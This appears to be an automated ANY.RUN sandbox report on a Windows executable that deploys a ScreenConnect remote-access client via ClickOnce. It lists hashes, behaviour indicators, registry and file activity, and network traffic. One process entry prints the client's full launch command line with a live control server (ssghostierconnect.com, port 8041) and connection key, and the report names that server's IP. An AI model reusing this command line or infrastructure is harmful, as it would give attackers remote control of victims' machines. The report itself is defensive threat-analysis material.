File name:

Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b

Full analysis: https://app.any.run/tasks/0843aec7-0213-4806-a362-e689839b4da3
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: May 16, 2025, 12:45:03
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
screenconnect
rat
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

51484F0C0F9854F9F74CA609569CE11B

SHA1:

DFA1C058AF0433DB147F759D206C5C57C0693A7E

SHA256:

B7B65DBD30AD4B73017275BF43F046B3EC0B76C1F55898E092FD5340FF9C2B7B

SSDEEP:

1536:lejLH3MVw8licIgWQog5Mzg+MoCdqQsWQcd69jPVfq7NKEH:8jLHcVw8licpWQog5Ms+f+l6xPVfqnH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)

    • Adds/modifies Windows certificates

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)

    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 7904)

    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 7904)

    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 7904)

    • Reads the date of Windows installation

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Executes application which crashes

      • ScreenConnect.ClientService.exe (PID: 7320)

    • Connects to unusual port

      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Detects ScreenConnect RAT (YARA)

      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.WindowsClient.exe (PID: 6044)

  • INFO

    • Reads the machine GUID from the registry

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)

    • Checks supported languages

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)

    • Reads the computer name

      • dfsvc.exe (PID: 7904)
      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)

    • Checks proxy server information

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • slui.exe (PID: 2692)

    • Reads Environment values

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Disables trace logs

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • WerFault.exe (PID: 1164)

    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 7904)

    • Create files in a temporary directory

      • dfsvc.exe (PID: 7904)

    • Reads the software policy settings

      • dfsvc.exe (PID: 7904)
      • slui.exe (PID: 2692)

    • Process checks computer location settings

      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • dfsvc.exe (PID: 7904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 19:55:37+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x14ba
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
132
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe no specs dfsvc.exe #SCREENCONNECT screenconnect.windowsclient.exe screenconnect.clientservice.exe werfault.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1164C:\WINDOWS\SysWOW64\WerFault.exe -u -p 7320 -s 1248C:\Windows\SysWOW64\WerFault.exeScreenConnect.ClientService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
2692C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6044"C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.WindowsClient.exe
dfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\9nagmghp.qmj\pjclx5qj.a3r\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
7320"C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.ClientService.exe" "?y=Guest&h=ssghostierconnect.com&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=" "5"C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3762504530
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\9nagmghp.qmj\pjclx5qj.a3r\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
7864"C:\Users\admin\Desktop\Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe" C:\Users\admin\Desktop\Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\desktop\sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
7904"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
12 072
Read events
11 868
Write events
177
Delete events
27

Modification events

(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
OYH1V78WB4B4JOVBAB8P4DY3
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
OYH1V78WB4B4JOVBAB8P4DY3
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
9NAGMGHPQMJPJCLX5QJA3RW5
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
1E9NOLQPTM1X1TB4PZ9592LE
(PID) Process:(7904) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
14
Suspicious files
20
Text files
30
Unknown types
1

Dropped files

PID
Process
Filename
Type
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\Q9MVEXJ2.CEY\Z3AW0BVV.8PG.applicationxml
MD5:A51027818F34FC5ACA94AF3975E82112
SHA256:9BA8267A16A16228FF01A9B3AA5648B1EF4D8A99326DFCDCBEB3D20BFDC7E958
7904dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
7904dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:0230EA6074314F790A5004CF36B4C947
SHA256:1CC448696B5382FB53957F687E207D3CB88D329E674CF78F1826341AD43D2496
7904dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:CA9FCDBC46A938BBD7900699444CC421
SHA256:C39EA85AA1AC5C5750C7346205F0B51158140B8046CF40945B198D0F91D07955
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.ClientService.exeexecutable
MD5:256081D2D140ED2727C1957317627136
SHA256:72B206D8C2EA0378F096C5E7C13022F67A0A0F670A10C1534B6F7A1BA95E8BE6
7904dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141der
MD5:53B81B51F4BA09B9531C26BCE4AFE0B9
SHA256:73669DC711C23F70F8216A1365885A26D425991879494A317638EA825D7D7630
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.WindowsClient.exeexecutable
MD5:254A33EC9D5391577B95D2CEA3CF06D8
SHA256:6BD3AB0299B3826E476461CAF1244E672D9F12858243921BEB3939134618B790
7904dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:4D43140F38E3227D78B11A29002DAC23
SHA256:C03B28A59D2EADB4C291CCAE564B3D20B1DD633BC2157C4EA80D3AEEDEF25EA4
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.ClientService.dllexecutable
MD5:B1346A9380086791ABEF5AA98903C80E
SHA256:43BBDB1C62D021A137E51CFB23241D3765089F98042E2A12A0B1449647290135
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Core.dllexecutable
MD5:6C5D0928642BF37CEED295B984E05BE2
SHA256:3B0C45370CA9295881EF5E9D14402C42DFB45803F54D542E6A7E595A05F365A1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
54
DNS requests
16
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7904
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
7904
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
4688
SIHClient.exe
GET
200
23.216.77.39:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7904
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
23.216.77.39:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
23.216.77.39:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.126.32.74:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
40.126.32.74:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7904
dfsvc.exe
23.95.173.124:443
ssghostierconnect.com
AS-COLOCROSSING
US
unknown
7904
dfsvc.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2112
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
google.com
  • 172.217.16.206
whitelisted
login.live.com
  • 40.126.32.74
  • 20.190.160.130
  • 40.126.32.76
  • 20.190.160.128
  • 40.126.32.138
  • 20.190.160.5
  • 40.126.32.136
  • 40.126.32.68
whitelisted
ssghostierconnect.com
  • 23.95.173.124
malicious
ocsp.digicert.com
